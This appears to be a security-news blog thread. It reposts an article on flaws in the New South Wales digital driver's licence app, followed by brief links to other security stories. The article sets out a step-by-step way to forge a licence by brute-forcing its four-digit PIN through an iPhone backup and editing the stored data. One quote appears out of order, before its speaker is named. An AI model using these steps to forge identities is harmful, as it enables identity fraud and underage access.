In late 2019, the government of New South Wales in Australia rolled out digital driver’s licenses. The new licenses allowed people to use their iPhone or Android device to show proof of identity and age during roadside police checks or at bars, stores, hotels, and other venues. ServiceNSW, as the government body is usually referred to, promised it would “provide additional levels of security and protection against identity fraud, compared to the plastic [driver's license]” citizens had used for decades.
Now, 30 months later, security researchers have shown that it’s trivial for just about anyone to forge fake identities using the digital driver’s licenses, or DDLs. The technique allows people under drinking age to change their date of birth and for fraudsters to forge fake identities. The process takes well under an hour, doesn’t require any special hardware or expensive software, and will generate fake IDs that pass inspection using the electronic verification system used by police and participating venues. All of this, despite assurances that security was a key priority for the newly created DDL system.
A better mousetrap hacked with minimal effort
“When an unsuspecting victim scans the fraudster’s QR code, everything will check out, and the victim won’t know that the fraudster has combined their own identification photo with someone’s stolen Driver’s Licence details,” he continued. As things have stood for the past 30 months, however, DDLs make it “possible for malicious users to generate [a] fraudulent Digital Driver’s Licence with minimal effort on both jailbroken and non-jailbroken devices without the need to modify or repackage the mobile application itself.”
DDLs require an iOS or Android app that displays each person’s credentials. The same app allows police and venues to verify that the credentials are authentic. Features designed to confirm the ID is authentic and current include:
Animated NSW Government logo.
Display of the last refreshed date and time.
A QR code expires and reloads.
A hologram that moves when the phone is tilted.
A watermark that matches the license photo.
Address details that don’t require scrolling.
Surprisingly simple
The technique for overcoming these safeguards is surprisingly simple. The key is the ability to brute-force the PIN that encrypts the data. Since it’s only four digits long, there are only 10,000 possible combinations. Using publicly available scripts and a commodity computer, someone can learn the correct combination in a matter of a few minutes, as this video, showing the process on an iPhone, demonstrates.
Once a fraudster gets access to someone’s encrypted DDL license data—either with permission, by stealing a copy stored in an iPhone backup, or through remote compromise—the brute force gives them the ability to read and modify any of the data stored on the file.
From there, it’s a matter of using simple brute-force software and standard smartphone and computer functions to extract the file storing the credential, decrypting it, changing the text, re-encrypting it, and copying it back to the device. The precise steps on an iPhone are:
Use iTunes backup to copy the contents of the iPhone storing the credential the fraudster wants to modify
Extract the encrypted file from the backup stored on the computer
Use brute-force software to decrypt the file
Open the file in a text editor and modify the birth date, address, or other data they want to fake
Re-encrypt the file
Copy the re-encrypted file to the backup folder and
Restore the backup to the iPhone
With that, the ServiceNSW app will display the fake ID and present it as genuine.
Death by 1,000 flaws
A variety of design flaws make this simple hack possible.
The first is a lack of adequate encryption. A key based on a four-digit PIN is woefully inadequate.
The next major flaw is that, astonishingly, DDL data is never validated against the back-end database to make sure that what’s stored on the iPhone matches records maintained by the government department.
The third shortcoming is that using the “pull-to-refresh” function—a cornerstone of the DDL verification scheme intended to ensure the most current information is showing—fails to refresh any of the data stored in the electronic credential. Instead, it updates only the QR code. A better response would be for the pull-to-refresh function to download the latest copy of the DDL from the ServiceNSW database.
Fourth, the QR code transmits only the DDL holder’s name and status as either over or under the age of 18. The QR code is supposed to allow the person checking the ID to scan it with their own ServiceNSW app to validate that the data presented is authentic. To bypass the check, a fraudster only needs to obtain the driver’s license details from a stolen or otherwise-obtained DDL and replace it locally on their phone.
“When an unsuspecting victim scans the fraudster’s QR code, everything will check out, and the victim won’t know that the fraudster has combined their own identification photo with someone’s stolen Driver’s Licence details,” Farmer explained. Had the system returned the legitimate image data, the scanning party would easily see that the fraudster had forged the DDL, since the face returned by Service NSW wouldn’t match the face displayed on the app.
The last flaw the researcher identified was that the app allows the data it stores to be backed up and restored at all. While all files stored in the Documents and Library/Application Support/ folders are backed up by default, iOS allows developers to easily exclude certain files from backup by calling NSURL setResourceValue:forKey:error: with the NSURLIsExcludedFromBackupKey key.
With a reported 4 million NSW residents using the DDLs, the gaffe could have serious consequences for anyone who relies on DDLs to verify identities, ages, addresses, or other personal information.
Farmer noted this tweet, which called out a hotel bar for refusing service to someone who had only physical ID and instead accepting only DDLs. “I know 10 kids that you let in regularly with fake digital licenses because they are easy to make,” the person claimed.
While the veracity of that claim can’t be verified, it certainly sounds plausible, given the ease and effectiveness of the hack shown here.
Tomi Engdahl says:
Vakoiluohjelmayhtiöt kauppaavat valtioille takaovea Android-laitteisiin kohteena myös Chrome
https://www.kauppalehti.fi/uutiset/vakoiluohjelmayhtiot-kauppaavat-valtioille-takaovea-android-laitteisiin-kohteena-myos-chrome/b4ae3f1b-7f82-477d-aabd-d2b81cad1605
Hämärät vakoiluohjelmayhtiöt myivät pääsyä useisiin nollapäivähaavoittuvuuksiin Chromessa ja Androidissa, Google paljasti maanantaina. Yritysten asiakkaina on ollut valtioihin liittyviä hakkereita.
Tomi Engdahl says:
Microsoft antoi Linux-käyttäjille epämääräisen varoituksen
https://www.tivi.fi/uutiset/tv/3d2b259a-34de-4722-8725-7814d8873f31
Microsoftin tietoturvatutkijat ovat havainneet voimakasta kasvua Linux-palvelimien kimppuun käyvän XorDdos-haittaohjelman käytössä.
Tomi Engdahl says:
Airline passengers left stranded after ransomware attack https://www.bitdefender.com/blog/hotforsecurity/airline-passengers-left-stranded-after-ransomware-attack/
An Indian airline says that an “attempted ransomware attack” against its IT infrastructure caused flights to be delayed or canceled, and left passengers stranded. Flights with popular Indian budget airline SpiceJet were disrupted by the cyber attack on Tuesday night, but the firm initially downplayed the impact of the attack – claiming that it had merely “slowed down morning flight departures”.
Tomi Engdahl says:
Operation Delilah: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Actor https://unit42.paloaltonetworks.com/operation-delilah-business-email-compromise-actor/
Today, INTERPOL and The Nigeria Police Force announced the arrest of a prominent business email compromise (BEC) actor who has been active since 2015. His apprehension marks the latest success for Operation Delilah – a counter-BEC operation that began in May 2021 and has involved international law enforcement and industry cooperation across four continents.
Tomi Engdahl says:
Darknet market Versus shuts down after hacker leaks security flaw https://www.bleepingcomputer.com/news/security/darknet-market-versus-shuts-down-after-hacker-leaks-security-flaw/
The Versus Market, one of the most popular English-speaking criminal darknet markets, is shutting down after discovering a severe exploit that could have allowed access to its database and exposed the IP address of its servers.